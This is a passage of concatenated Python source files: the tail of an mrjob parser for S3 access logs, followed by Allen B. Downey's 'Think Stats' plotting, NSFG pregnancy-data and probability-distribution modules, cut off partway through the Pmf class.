range(NUM_ENTRIES_PER_LINE) DELIMITER = '\t' # We use RawValueProtocol for input to be format agnostic # and avoid any type of parsing errors INPUT_PROTOCOL = RawValueProtocol # We use RawValueProtocol for output so we can output raw lines # instead of (k, v) pairs OUTPUT_PROTOCOL = RawValueProtocol # Encode the intermediate records using repr() instead of JSON, so the # record doesn't get Unicode-encoded INTERNAL_PROTOCOL = ReprProtocol def clean_date_time_zone(self, raw_date_time_zone): """Converts entry 22/Jul/2013:21:04:17 +0000 to the format 'YYYY-MM-DD HH:MM:SS' which is more suitable for loading into a database such as Redshift or RDS Note: requires the chars "[ ]" to be stripped prior to input Returns the converted datetime annd timezone or None for both values if failed TODO: Needs to combine timezone with date as one field """ date_time = None time_zone_parsed = None # TODO: Probably cleaner to parse this with a regex date_parsed = raw_date_time_zone[:raw_date_time_zone.find(":")] time_parsed = raw_date_time_zone[raw_date_time_zone.find(":") + 1: raw_date_time_zone.find("+") - 1] time_zone_parsed = raw_date_time_zone[raw_date_time_zone.find("+"):] try: date_struct = time.strptime(date_parsed, "%d/%b/%Y") converted_date = time.strftime("%Y-%m-%d", date_struct) date_time = converted_date + " " + time_parsed # Throws a ValueError exception if the operation fails that is # caught by the calling function and is handled appropriately except ValueError as error: raise ValueError(error) else: return converted_date, date_time, time_zone_parsed def mapper(self, _, line): line = line.strip() match = self.logpat.search(line) date_time = None requester = None user_agent = None operation = None try: for n in range(self.NUM_ENTRIES_PER_LINE): group = match.group(1 + n) if n == self.S3_LOG_DATE_TIME: date, date_time, time_zone_parsed = \ self.clean_date_time_zone(group) # Leave the following line of code if # you want to aggregate by date date_time = date + " 00:00:00" elif n == self.S3_LOG_REQUESTER_ID: requester = group elif n == self.S3_LOG_USER_AGENT: user_agent = group elif n == self.S3_LOG_OPERATION: operation = group else: pass except Exception: yield (("Error while parsing line: %s", line), 1) else: yield ((date_time, requester, user_agent, operation), 1) def reducer(self, key, values): output = list(key) output = self.DELIMITER.join(output) + \ self.DELIMITER + \ str(sum(values)) yield None, output def steps(self): return [ self.mr(mapper=self.mapper, reducer=self.reducer) ] if __name__ == '__main__': MrS3LogParser.run() File: scipy/thinkplot.py """This file contains code for use with "Think Stats", by Allen B. Downey, available from greenteapress.com Copyright 2014 Allen B. Downey License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html """ from __future__ import print_function import math import matplotlib import matplotlib.pyplot as pyplot import numpy as np import pandas import warnings # customize some matplotlib attributes #matplotlib.rc('figure', figsize=(4, 3)) #matplotlib.rc('font', size=14.0) #matplotlib.rc('axes', labelsize=22.0, titlesize=22.0) #matplotlib.rc('legend', fontsize=20.0) #matplotlib.rc('xtick.major', size=6.0) #matplotlib.rc('xtick.minor', size=3.0) #matplotlib.rc('ytick.major', size=6.0) #matplotlib.rc('ytick.minor', size=3.0) class _Brewer(object): """Encapsulates a nice sequence of colors. Shades of blue that look good in color and can be distinguished in grayscale (up to a point). Borrowed from http://colorbrewer2.org/ """ color_iter = None colors = ['#081D58', '#253494', '#225EA8', '#1D91C0', '#41B6C4', '#7FCDBB', '#C7E9B4', '#EDF8B1', '#FFFFD9'] # lists that indicate which colors to use depending on how many are used which_colors = [[], [1], [1, 3], [0, 2, 4], [0, 2, 4, 6], [0, 2, 3, 5, 6], [0, 2, 3, 4, 5, 6], [0, 1, 2, 3, 4, 5, 6], ] @classmethod def Colors(cls): """Returns the list of colors. """ return cls.colors @classmethod def ColorGenerator(cls, n): """Returns an iterator of color strings. n: how many colors will be used """ for i in cls.which_colors[n]: yield cls.colors[i] raise StopIteration('Ran out of colors in _Brewer.ColorGenerator') @classmethod def InitializeIter(cls, num): """Initializes the color iterator with the given number of colors.""" cls.color_iter = cls.ColorGenerator(num) @classmethod def ClearIter(cls): """Sets the color iterator to None.""" cls.color_iter = None @classmethod def GetIter(cls): """Gets the color iterator.""" if cls.color_iter is None: cls.InitializeIter(7) return cls.color_iter def PrePlot(num=None, rows=None, cols=None): """Takes hints about what's coming. num: number of lines that will be plotted rows: number of rows of subplots cols: number of columns of subplots """ if num: _Brewer.InitializeIter(num) if rows is None and cols is None: return if rows is not None and cols is None: cols = 1 if cols is not None and rows is None: rows = 1 # resize the image, depending on the number of rows and cols size_map = {(1, 1): (8, 6), (1, 2): (14, 6), (1, 3): (14, 6), (2, 2): (10, 10), (2, 3): (16, 10), (3, 1): (8, 10), } if (rows, cols) in size_map: fig = pyplot.gcf() fig.set_size_inches(*size_map[rows, cols]) # create the first subplot if rows > 1 or cols > 1: pyplot.subplot(rows, cols, 1) global SUBPLOT_ROWS, SUBPLOT_COLS SUBPLOT_ROWS = rows SUBPLOT_COLS = cols def SubPlot(plot_number, rows=None, cols=None): """Configures the number of subplots and changes the current plot. rows: int cols: int plot_number: int """ rows = rows or SUBPLOT_ROWS cols = cols or SUBPLOT_COLS pyplot.subplot(rows, cols, plot_number) def _Underride(d, **options): """Add key-value pairs to d only if key is not in d. If d is None, create a new dictionary. d: dictionary options: keyword args to add to d """ if d is None: d = {} for key, val in options.items(): d.setdefault(key, val) return d def Clf(): """Clears the figure and any hints that have been set.""" global LOC LOC = None _Brewer.ClearIter() pyplot.clf() fig = pyplot.gcf() fig.set_size_inches(8, 6) def Figure(**options): """Sets options for the current figure.""" _Underride(options, figsize=(6, 8)) pyplot.figure(**options) def _UnderrideColor(options): if 'color' in options: return options color_iter = _Brewer.GetIter() if color_iter: try: options['color'] = next(color_iter) except StopIteration: # TODO: reconsider whether this should warn # warnings.warn('Warning: Brewer ran out of colors.') _Brewer.ClearIter() return options def Plot(obj, ys=None, style='', **options): """Plots a line. Args: obj: sequence of x values, or Series, or anything with Render() ys: sequence of y values style: style string passed along to pyplot.plot options: keyword args passed to pyplot.plot """ options = _UnderrideColor(options) label = getattr(obj, 'label', '_nolegend_') options = _Underride(options, linewidth=3, alpha=0.8, label=label) xs = obj if ys is None: if hasattr(obj, 'Render'): xs, ys = obj.Render() if isinstance(obj, pandas.Series): ys = obj.values xs = obj.index if ys is None: pyplot.plot(xs, style, **options) else: pyplot.plot(xs, ys, style, **options) def FillBetween(xs, y1, y2=None, where=None, **options): """Plots a line. Args: xs: sequence of x values y1: sequence of y values y2: sequence of y values where: sequence of boolean options: keyword args passed to pyplot.fill_between """ options = _UnderrideColor(options) options = _Underride(options, linewidth=0, alpha=0.5) pyplot.fill_between(xs, y1, y2, where, **options) def Bar(xs, ys, **options): """Plots a line. Args: xs: sequence of x values ys: sequence of y values options: keyword args passed to pyplot.bar """ options = _UnderrideColor(options) options = _Underride(options, linewidth=0, alpha=0.6) pyplot.bar(xs, ys, **options) def Scatter(xs, ys=None, **options): """Makes a scatter plot. xs: x values ys: y values options: options passed to pyplot.scatter """ options = _Underride(options, color='blue', alpha=0.2, s=30, edgecolors='none') if ys is None and isinstance(xs, pandas.Series): ys = xs.values xs = xs.index pyplot.scatter(xs, ys, **options) def HexBin(xs, ys, **options): """Makes a scatter plot. xs: x values ys: y values options: options passed to pyplot.scatter """ options = _Underride(options, cmap=matplotlib.cm.Blues) pyplot.hexbin(xs, ys, **options) def Pdf(pdf, **options): """Plots a Pdf, Pmf, or Hist as a line. Args: pdf: Pdf, Pmf, or Hist object options: keyword args passed to pyplot.plot """ low, high = options.pop('low', None), options.pop('high', None) n = options.pop('n', 101) xs, ps = pdf.Render(low=low, high=high, n=n) options = _Underride(options, label=pdf.label) Plot(xs, ps, **options) def Pdfs(pdfs, **options): """Plots a sequence of PDFs. Options are passed along for all PDFs. If you want different options for each pdf, make multiple calls to Pdf. Args: pdfs: sequence of PDF objects options: keyword args passed to pyplot.plot """ for pdf in pdfs: Pdf(pdf, **options) def Hist(hist, **options): """Plots a Pmf or Hist with a bar plot. The default width of the bars is based on the minimum difference between values in the Hist. If that's too small, you can override it by providing a width keyword argument, in the same units as the values. Args: hist: Hist or Pmf object options: keyword args passed to pyplot.bar """ # find the minimum distance between adjacent values xs, ys = hist.Render() if 'width' not in options: try: options['width'] = 0.9 * np.diff(xs).min() except TypeError: warnings.warn("Hist: Can't compute bar width automatically." "Check for non-numeric types in Hist." "Or try providing width option." ) options = _Underride(options, label=hist.label) options = _Underride(options, align='center') if options['align'] == 'left': options['align'] = 'edge' elif options['align'] == 'right': options['align'] = 'edge' options['width'] *= -1 Bar(xs, ys, **options) def Hists(hists, **options): """Plots two histograms as interleaved bar plots. Options are passed along for all PMFs. If you want different options for each pmf, make multiple calls to Pmf. Args: hists: list of two Hist or Pmf objects options: keyword args passed to pyplot.plot """ for hist in hists: Hist(hist, **options) def Pmf(pmf, **options): """Plots a Pmf or Hist as a line. Args: pmf: Hist or Pmf object options: keyword args passed to pyplot.plot """ xs, ys = pmf.Render() low, high = min(xs), max(xs) width = options.pop('width', None) if width is None: try: width = np.diff(xs).min() except TypeError: warnings.warn("Pmf: Can't compute bar width automatically." "Check for non-numeric types in Pmf." "Or try providing width option.") points = [] lastx = np.nan lasty = 0 for x, y in zip(xs, ys): if (x - lastx) > 1e-5: points.append((lastx, 0)) points.append((x, 0)) points.append((x, lasty)) points.append((x, y)) points.append((x+width, y)) lastx = x + width lasty = y points.append((lastx, 0)) pxs, pys = zip(*points) align = options.pop('align', 'center') if align == 'center': pxs = np.array(pxs) - width/2.0 if align == 'right': pxs = np.array(pxs) - width options = _Underride(options, label=pmf.label) Plot(pxs, pys, **options) def Pmfs(pmfs, **options): """Plots a sequence of PMFs. Options are passed along for all PMFs. If you want different options for each pmf, make multiple calls to Pmf. Args: pmfs: sequence of PMF objects options: keyword args passed to pyplot.plot """ for pmf in pmfs: Pmf(pmf, **options) def Diff(t): """Compute the differences between adjacent elements in a sequence. Args: t: sequence of number Returns: sequence of differences (length one less than t) """ diffs = [t[i+1] - t[i] for i in range(len(t)-1)] return diffs def Cdf(cdf, complement=False, transform=None, **options): """Plots a CDF as a line. Args: cdf: Cdf object complement: boolean, whether to plot the complementary CDF transform: string, one of 'exponential', 'pareto', 'weibull', 'gumbel' options: keyword args passed to pyplot.plot Returns: dictionary with the scale options that should be passed to Config, Show or Save. """ xs, ps = cdf.Render() xs = np.asarray(xs) ps = np.asarray(ps) scale = dict(xscale='linear', yscale='linear') for s in ['xscale', 'yscale']: if s in options: scale[s] = options.pop(s) if transform == 'exponential': complement = True scale['yscale'] = 'log' if transform == 'pareto': complement = True scale['yscale'] = 'log' scale['xscale'] = 'log' if complement: ps = [1.0-p for p in ps] if transform == 'weibull': xs = np.delete(xs, -1) ps = np.delete(ps, -1) ps = [-math.log(1.0-p) for p in ps] scale['xscale'] = 'log' scale['yscale'] = 'log' if transform == 'gumbel': xs = xp.delete(xs, 0) ps = np.delete(ps, 0) ps = [-math.log(p) for p in ps] scale['yscale'] = 'log' options = _Underride(options, label=cdf.label) Plot(xs, ps, **options) return scale def Cdfs(cdfs, complement=False, transform=None, **options): """Plots a sequence of CDFs. cdfs: sequence of CDF objects complement: boolean, whether to plot the complementary CDF transform: string, one of 'exponential', 'pareto', 'weibull', 'gumbel' options: keyword args passed to pyplot.plot """ for cdf in cdfs: Cdf(cdf, complement, transform, **options) def Contour(obj, pcolor=False, contour=True, imshow=False, **options): """Makes a contour plot. d: map from (x, y) to z, or object that provides GetDict pcolor: boolean, whether to make a pseudocolor plot contour: boolean, whether to make a contour plot imshow: boolean, whether to use pyplot.imshow options: keyword args passed to pyplot.pcolor and/or pyplot.contour """ try: d = obj.GetDict() except AttributeError: d = obj _Underride(options, linewidth=3, cmap=matplotlib.cm.Blues) xs, ys = zip(*d.keys()) xs = sorted(set(xs)) ys = sorted(set(ys)) X, Y = np.meshgrid(xs, ys) func = lambda x, y: d.get((x, y), 0) func = np.vectorize(func) Z = func(X, Y) x_formatter = matplotlib.ticker.ScalarFormatter(useOffset=False) axes = pyplot.gca() axes.xaxis.set_major_formatter(x_formatter) if pcolor: pyplot.pcolormesh(X, Y, Z, **options) if contour: cs = pyplot.contour(X, Y, Z, **options) pyplot.clabel(cs, inline=1, fontsize=10) if imshow: extent = xs[0], xs[-1], ys[0], ys[-1] pyplot.imshow(Z, extent=extent, **options) def Pcolor(xs, ys, zs, pcolor=True, contour=False, **options): """Makes a pseudocolor plot. xs: ys: zs: pcolor: boolean, whether to make a pseudocolor plot contour: boolean, whether to make a contour plot options: keyword args passed to pyplot.pcolor and/or pyplot.contour """ _Underride(options, linewidth=3, cmap=matplotlib.cm.Blues) X, Y = np.meshgrid(xs, ys) Z = zs x_formatter = matplotlib.ticker.ScalarFormatter(useOffset=False) axes = pyplot.gca() axes.xaxis.set_major_formatter(x_formatter) if pcolor: pyplot.pcolormesh(X, Y, Z, **options) if contour: cs = pyplot.contour(X, Y, Z, **options) pyplot.clabel(cs, inline=1, fontsize=10) def Text(x, y, s, **options): """Puts text in a figure. x: number y: number s: string options: keyword args passed to pyplot.text """ options = _Underride(options, fontsize=16, verticalalignment='top', horizontalalignment='left') pyplot.text(x, y, s, **options) LEGEND = True LOC = None def Config(**options): """Configures the plot. Pulls options out of the option dictionary and passes them to the corresponding pyplot functions. """ names = ['title', 'xlabel', 'ylabel', 'xscale', 'yscale', 'xticks', 'yticks', 'axis', 'xlim', 'ylim'] for name in names: if name in options: getattr(pyplot, name)(options[name]) # looks like this is not necessary: matplotlib understands text loc specs loc_dict = {'upper right': 1, 'upper left': 2, 'lower left': 3, 'lower right': 4, 'right': 5, 'center left': 6, 'center right': 7, 'lower center': 8, 'upper center': 9, 'center': 10, } global LEGEND LEGEND = options.get('legend', LEGEND) if LEGEND: global LOC LOC = options.get('loc', LOC) pyplot.legend(loc=LOC) def Show(**options): """Shows the plot. For options, see Config. options: keyword args used to invoke various pyplot functions """ clf = options.pop('clf', True) Config(**options) pyplot.show() if clf: Clf() def Plotly(**options): """Shows the plot. For options, see Config. options: keyword args used to invoke various pyplot functions """ clf = options.pop('clf', True) Config(**options) import plotly.plotly as plotly url = plotly.plot_mpl(pyplot.gcf()) if clf: Clf() return url def Save(root=None, formats=None, **options): """Saves the plot in the given formats and clears the figure. For options, see Config. Args: root: string filename root formats: list of string formats options: keyword args used to invoke various pyplot functions """ clf = options.pop('clf', True) Config(**options) if formats is None: formats = ['pdf', 'eps'] try: formats.remove('plotly') Plotly(clf=False) except ValueError: pass if root: for fmt in formats: SaveFormat(root, fmt) if clf: Clf() def SaveFormat(root, fmt='eps'): """Writes the current figure to a file in the given format. Args: root: string filename root fmt: string format """ filename = '%s.%s' % (root, fmt) print('Writing', filename) pyplot.savefig(filename, format=fmt, dpi=300) # provide aliases for calling functons with lower-case names preplot = PrePlot subplot = SubPlot clf = Clf figure = Figure plot = Plot text = Text scatter = Scatter pmf = Pmf pmfs = Pmfs hist = Hist hists = Hists diff = Diff cdf = Cdf cdfs = Cdfs contour = Contour pcolor = Pcolor config = Config show = Show save = Save def main(): color_iter = _Brewer.ColorGenerator(7) for color in color_iter: print(color) if __name__ == '__main__': main() File: scipy/__init__.py File: scipy/first.py """This file contains code used in "Think Stats", by Allen B. Downey, available from greenteapress.com Copyright 2014 Allen B. Downey License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html """ from __future__ import print_function import math import numpy as np import nsfg import thinkstats2 import thinkplot def MakeFrames(): """Reads pregnancy data and partitions first babies and others. returns: DataFrames (all live births, first babies, others) """ preg = nsfg.ReadFemPreg() live = preg[preg.outcome == 1] firsts = live[live.birthord == 1] others = live[live.birthord != 1] assert len(live) == 9148 assert len(firsts) == 4413 assert len(others) == 4735 return live, firsts, others def Summarize(live, firsts, others): """Print various summary statistics.""" mean = live.prglngth.mean() var = live.prglngth.var() std = live.prglngth.std() print('Live mean', mean) print('Live variance', var) print('Live std', std) mean1 = firsts.prglngth.mean() mean2 = others.prglngth.mean() var1 = firsts.prglngth.var() var2 = others.prglngth.var() print('Mean') print('First babies', mean1) print('Others', mean2) print('Variance') print('First babies', var1) print('Others', var2) print('Difference in weeks', mean1 - mean2) print('Difference in hours', (mean1 - mean2) * 7 * 24) print('Difference relative to 39 weeks', (mean1 - mean2) / 39 * 100) d = thinkstats2.CohenEffectSize(firsts.prglngth, others.prglngth) print('Cohen d', d) def PrintExtremes(live): """Plots the histogram of pregnancy lengths and prints the extremes. live: DataFrame of live births """ hist = thinkstats2.Hist(live.prglngth) thinkplot.Hist(hist, label='live births') thinkplot.Save(root='first_nsfg_hist_live', title='Histogram', xlabel='weeks', ylabel='frequency') print('Shortest lengths:') for weeks, freq in hist.Smallest(10): print(weeks, freq) print('Longest lengths:') for weeks, freq in hist.Largest(10): print(weeks, freq) def MakeHists(live): """Plot Hists for live births live: DataFrame others: DataFrame """ hist = thinkstats2.Hist(live.birthwgt_lb, label='birthwgt_lb') thinkplot.Hist(hist) thinkplot.Save(root='first_wgt_lb_hist', xlabel='pounds', ylabel='frequency', axis=[-1, 14, 0, 3200]) hist = thinkstats2.Hist(live.birthwgt_oz, label='birthwgt_oz') thinkplot.Hist(hist) thinkplot.Save(root='first_wgt_oz_hist', xlabel='ounces', ylabel='frequency', axis=[-1, 16, 0, 1200]) hist = thinkstats2.Hist(np.floor(live.agepreg), label='agepreg') thinkplot.Hist(hist) thinkplot.Save(root='first_agepreg_hist', xlabel='years', ylabel='frequency') hist = thinkstats2.Hist(live.prglngth, label='prglngth') thinkplot.Hist(hist) thinkplot.Save(root='first_prglngth_hist', xlabel='weeks', ylabel='frequency', axis=[-1, 53, 0, 5000]) def MakeComparison(firsts, others): """Plots histograms of pregnancy length for first babies and others. firsts: DataFrame others: DataFrame """ first_hist = thinkstats2.Hist(firsts.prglngth, label='first') other_hist = thinkstats2.Hist(others.prglngth, label='other') width = 0.45 thinkplot.PrePlot(2) thinkplot.Hist(first_hist, align='right', width=width) thinkplot.Hist(other_hist, align='left', width=width) thinkplot.Save(root='first_nsfg_hist', title='Histogram', xlabel='weeks', ylabel='frequency', axis=[27, 46, 0, 2700]) def main(script): live, firsts, others = MakeFrames() MakeHists(live) PrintExtremes(live) MakeComparison(firsts, others) Summarize(live, firsts, others) if __name__ == '__main__': import sys main(*sys.argv) File: scipy/nsfg.py """This file contains code for use with "Think Stats", by Allen B. Downey, available from greenteapress.com Copyright 2010 Allen B. Downey License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html """ from __future__ import print_function from collections import defaultdict import numpy as np import sys import thinkstats2 def ReadFemPreg(dct_file='2002FemPreg.dct', dat_file='2002FemPreg.dat.gz'): """Reads the NSFG pregnancy data. dct_file: string file name dat_file: string file name returns: DataFrame """ dct = thinkstats2.ReadStataDct(dct_file) df = dct.ReadFixedWidth(dat_file, compression='gzip') CleanFemPreg(df) return df def CleanFemPreg(df): """Recodes variables from the pregnancy frame. df: DataFrame """ # mother's age is encoded in centiyears; convert to years df.agepreg /= 100.0 # birthwgt_lb contains at least one bogus value (51 lbs) # replace with NaN df.birthwgt_lb[df.birthwgt_lb > 20] = np.nan # replace 'not ascertained', 'refused', 'don't know' with NaN na_vals = [97, 98, 99] df.birthwgt_lb.replace(na_vals, np.nan, inplace=True) df.birthwgt_oz.replace(na_vals, np.nan, inplace=True) df.hpagelb.replace(na_vals, np.nan, inplace=True) df.babysex.replace([7, 9], np.nan, inplace=True) df.nbrnaliv.replace([9], np.nan, inplace=True) # birthweight is stored in two columns, lbs and oz. # convert to a single column in lb # NOTE: creating a new column requires dictionary syntax, # not attribute assignment (like df.totalwgt_lb) df['totalwgt_lb'] = df.birthwgt_lb + df.birthwgt_oz / 16.0 # due to a bug in ReadStataDct, the last variable gets clipped; # so for now set it to NaN df.cmintvw = np.nan def MakePregMap(df): """Make a map from caseid to list of preg indices. df: DataFrame returns: dict that maps from caseid to list of indices into preg df """ d = defaultdict(list) for index, caseid in df.caseid.iteritems(): d[caseid].append(index) return d def main(script): """Tests the functions in this module. script: string script name """ df = ReadFemPreg() print(df.shape) assert len(df) == 13593 assert df.caseid[13592] == 12571 assert df.pregordr.value_counts()[1] == 5033 assert df.nbrnaliv.value_counts()[1] == 8981 assert df.babysex.value_counts()[1] == 4641 assert df.birthwgt_lb.value_counts()[7] == 3049 assert df.birthwgt_oz.value_counts()[0] == 1037 assert df.prglngth.value_counts()[39] == 4744 assert df.outcome.value_counts()[1] == 9148 assert df.birthord.value_counts()[1] == 4413 assert df.agepreg.value_counts()[22.75] == 100 assert df.totalwgt_lb.value_counts()[7.5] == 302 weights = df.finalwgt.value_counts() key = max(weights.keys()) assert df.finalwgt.value_counts()[key] == 6 print('%s: All tests passed.' % script) if __name__ == '__main__': main(*sys.argv) File: scipy/thinkstats2.py """This file contains code for use with "Think Stats" and "Think Bayes", both by Allen B. Downey, available from greenteapress.com Copyright 2014 Allen B. Downey License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html """ from __future__ import print_function, division """This file contains class definitions for: Hist: represents a histogram (map from values to integer frequencies). Pmf: represents a probability mass function (map from values to probs). _DictWrapper: private parent class for Hist and Pmf. Cdf: represents a discrete cumulative distribution function Pdf: represents a continuous probability density function """ import bisect import copy import logging import math import random import re from collections import Counter from operator import itemgetter import thinkplot import numpy as np import pandas import scipy from scipy import stats from scipy import special from scipy import ndimage from io import open ROOT2 = math.sqrt(2) def RandomSeed(x): """Initialize the random and np.random generators. x: int seed """ random.seed(x) np.random.seed(x) def Odds(p): """Computes odds for a given probability. Example: p=0.75 means 75 for and 25 against, or 3:1 odds in favor. Note: when p=1, the formula for odds divides by zero, which is normally undefined. But I think it is reasonable to define Odds(1) to be infinity, so that's what this function does. p: float 0-1 Returns: float odds """ if p == 1: return float('inf') return p / (1 - p) def Probability(o): """Computes the probability corresponding to given odds. Example: o=2 means 2:1 odds in favor, or 2/3 probability o: float odds, strictly positive Returns: float probability """ return o / (o + 1) def Probability2(yes, no): """Computes the probability corresponding to given odds. Example: yes=2, no=1 means 2:1 odds in favor, or 2/3 probability. yes, no: int or float odds in favor """ return yes / (yes + no) class Interpolator(object): """Represents a mapping between sorted sequences; performs linear interp. Attributes: xs: sorted list ys: sorted list """ def __init__(self, xs, ys): self.xs = xs self.ys = ys def Lookup(self, x): """Looks up x and returns the corresponding value of y.""" return self._Bisect(x, self.xs, self.ys) def Reverse(self, y): """Looks up y and returns the corresponding value of x.""" return self._Bisect(y, self.ys, self.xs) def _Bisect(self, x, xs, ys): """Helper function.""" if x <= xs[0]: return ys[0] if x >= xs[-1]: return ys[-1] i = bisect.bisect(xs, x) frac = 1.0 * (x - xs[i - 1]) / (xs[i] - xs[i - 1]) y = ys[i - 1] + frac * 1.0 * (ys[i] - ys[i - 1]) return y class _DictWrapper(object): """An object that contains a dictionary.""" def __init__(self, obj=None, label=None): """Initializes the distribution. obj: Hist, Pmf, Cdf, Pdf, dict, pandas Series, list of pairs label: string label """ self.label = label if label is not None else '_nolegend_' self.d = {} # flag whether the distribution is under a log transform self.log = False if obj is None: return if isinstance(obj, (_DictWrapper, Cdf, Pdf)): self.label = label if label is not None else obj.label if isinstance(obj, dict): self.d.update(obj.items()) elif isinstance(obj, (_DictWrapper, Cdf, Pdf)): self.d.update(obj.Items()) elif isinstance(obj, pandas.Series): self.d.update(obj.value_counts().iteritems()) else: # finally, treat it like a list self.d.update(Counter(obj)) if len(self) > 0 and isinstance(self, Pmf): self.Normalize() def __hash__(self): return id(self) def __str__(self): cls = self.__class__.__name__ return '%s(%s)' % (cls, str(self.d)) __repr__ = __str__ def __eq__(self, other): return self.d == other.d def __len__(self): return len(self.d) def __iter__(self): return iter(self.d) def iterkeys(self): """Returns an iterator over keys.""" return iter(self.d) def __contains__(self, value): return value in self.d def __getitem__(self, value): return self.d.get(value, 0) def __setitem__(self, value, prob): self.d[value] = prob def __delitem__(self, value): del self.d[value] def Copy(self, label=None): """Returns a copy. Make a shallow copy of d. If you want a deep copy of d, use copy.deepcopy on the whole object. label: string label for the new Hist returns: new _DictWrapper with the same type """ new = copy.copy(self) new.d = copy.copy(self.d) new.label = label if label is not None else self.label return new def Scale(self, factor): """Multiplies the values by a factor. factor: what to multiply by Returns: new object """ new = self.Copy() new.d.clear() for val, prob in self.Items(): new.Set(val * factor, prob) return new def Log(self, m=None): """Log transforms the probabilities. Removes values with probability 0. Normalizes so that the largest logprob is 0. """ if self.log: raise ValueError("Pmf/Hist already under a log transform") self.log = True if m is None: m = self.MaxLike() for x, p in self.d.items(): if p: self.Set(x, math.log(p / m)) else: self.Remove(x) def Exp(self, m=None): """Exponentiates the probabilities. m: how much to shift the ps before exponentiating If m is None, normalizes so that the largest prob is 1. """ if not self.log: raise ValueError("Pmf/Hist not under a log transform") self.log = False if m is None: m = self.MaxLike() for x, p in self.d.items(): self.Set(x, math.exp(p - m)) def GetDict(self): """Gets the dictionary.""" return self.d def SetDict(self, d): """Sets the dictionary.""" self.d = d def Values(self): """Gets an unsorted sequence of values. Note: one source of confusion is that the keys of this dictionary are the values of the Hist/Pmf, and the values of the dictionary are frequencies/probabilities. """ return self.d.keys() def Items(self): """Gets an unsorted sequence of (value, freq/prob) pairs.""" return self.d.items() def Render(self, **options): """Generates a sequence of points suitable for plotting. Note: options are ignored Returns: tuple of (sorted value sequence, freq/prob sequence) """ if min(self.d.keys()) is np.nan: logging.warning('Hist: contains NaN, may not render correctly.') return zip(*sorted(self.Items())) def MakeCdf(self, label=None): """Makes a Cdf.""" label = label if label is not None else self.label return Cdf(self, label=label) def Print(self): """Prints the values and freqs/probs in ascending order.""" for val, prob in sorted(self.d.items()): print(val, prob) def Set(self, x, y=0): """Sets the freq/prob associated with the value x. Args: x: number value y: number freq or prob """ self.d[x] = y def Incr(self, x, term=1): """Increments the freq/prob associated with the value x. Args: x: number value term: how much to increment by """ self.d[x] = self.d.get(x, 0) + term def Mult(self, x, factor): """Scales the freq/prob associated with the value x. Args: x: number value factor: how much to multiply by """ self.d[x] = self.d.get(x, 0) * factor def Remove(self, x): """Removes a value. Throws an exception if the value is not there. Args: x: value to remove """ del self.d[x] def Total(self): """Returns the total of the frequencies/probabilities in the map.""" total = sum(self.d.values()) return total def MaxLike(self): """Returns the largest frequency/probability in the map.""" return max(self.d.values()) def Largest(self, n=10): """Returns the largest n values, with frequency/probability. n: number of items to return """ return sorted(self.d.items(), reverse=True)[:n] def Smallest(self, n=10): """Returns the smallest n values, with frequency/probability. n: number of items to return """ return sorted(self.d.items(), reverse=False)[:n] class Hist(_DictWrapper): """Represents a histogram, which is a map from values to frequencies. Values can be any hashable type; frequencies are integer counters. """ def Freq(self, x): """Gets the frequency associated with the value x. Args: x: number value Returns: int frequency """ return self.d.get(x, 0) def Freqs(self, xs): """Gets frequencies for a sequence of values.""" return [self.Freq(x) for x in xs] def IsSubset(self, other): """Checks whether the values in this histogram are a subset of the values in the given histogram.""" for val, freq in self.Items(): if freq > other.Freq(val): return False return True def Subtract(self, other): """Subtracts the values in the given histogram from this histogram.""" for val, freq in other.Items(): self.Incr(val, -freq) class Pmf(_DictWrapper): """Represents a probability mass function. Values can be any hashable type; probabilities are floating-point. Pmfs are not necessarily normalized. """ def Prob(self, x, default=0): """Gets the probability associated with the value x. Args: x: number value default: value to return if the key is not there Returns: float probability """ return self.d.get(x, default) def Probs(self, xs): """Gets probabilities for a sequence of values.""" return [self.Prob(x) for x in xs] def Percentile(self, percentage): """Computes a percentile of a given Pmf. Note: this is not super efficient. If you are planning to compute more than a few percentiles, compute the Cdf. percentage: float 0-100 returns: value from the Pmf """ p = percentage / 100.0 total = 0 for val, prob in sorted(self.Items()): total += prob if total >= p: return val def ProbGreater(self, x): """Probability that a sample from this Pmf exceeds x. x: number returns: float probability """ if isinstance(x, _DictWrapper): return PmfProbGreater(self, x) else: t = [prob for (val, prob) in self.d.items() if val > x] return sum(t) def ProbLess(self, x): """Probability that a sample from this Pmf is less than x. x: number returns: float probability """ if isinstance(x, _DictWrapper): return PmfProbLess(self, x) else: t = [prob for (val, prob) in self.d.items() if val < x] return sum(t) def __lt__(self, obj): """Less than. obj: number or _DictWrapper returns: float probability """ return self.ProbLess(obj) def __gt__(self, obj): """Greater than. obj: number or _DictWrapper returns: float probability """ return self.ProbGreater(obj) def __ge__(self, obj): """Greater than or equal. obj: number or _DictWrapper returns: float probability """ return 1 - (self < obj) def __le__(self, obj): """Less than or equal. obj: number or _DictWrapper returns: float probability """ return 1 - (self > obj) def Normalize(self, fraction=1.0): """Normalizes this PMF so the sum of all probs is fraction. Args: fraction: what the total should be after normalization Returns: the total probability before normalizing """ if self.log: raise ValueError("Normalize: Pmf is under a log transform") total = self.Total() if total == 0.0: raise ValueError('Normalize: total probability is zero.') #logging.warning('Normalize: total probability is zero.') #return total factor = fraction / total for x in self.d: self.d[x] *= factor return total def Random(self): """Chooses a random element from this PMF. Note: this is not very efficient. If you plan to call this more than a few times, consider converting to a CDF. Returns: float value from the Pmf """ target = random.random() total = 0.0 for x, p in self.d.items(): total += p if total >= target: return x # we shouldn't get here raise ValueError('Random: Pmf might not be normalized.') def Mean(self): """Computes the mean of a PMF. Returns: float mean """ mean = 0.0 for x, p in self.d.items(): mean += p * x return mean def Var(self, mu=None): """Computes the variance of a PMF. mu: the point around which the variance is computed; if omitted, computes the mean returns: float variance """ if mu is None: mu = self.Mean() var = 0.0 for x, p in self.d.items(): var += p * (x - mu) ** 2 return var def Std(self, mu=None): """Computes the standard deviation of a PMF. mu: the point around which the variance is computed; if omitted, computes the mean returns: float standard deviation """ var = self.Var(mu) return math.sqrt(var) def MaximumLikelihood(self): """Returns the value with the highest probability. Returns: float probability """ _, val = max((prob, val) for val, prob in self.Items()) return val def CredibleInterval(self, percentage=90): """Computes the central credible interval. If percentage=90, computes the 90% CI. Args: percentage: float between 0 and 100 Returns: sequence of two floats, low and high """ cdf = self.MakeCdf() return cdf.CredibleInterval(percentage) def __add__(self, other): """Computes the Pmf of the sum of values drawn from self and other. other: another Pmf or a scalar returns: new Pmf """ try: return self.AddPmf(other) except AttributeError: return 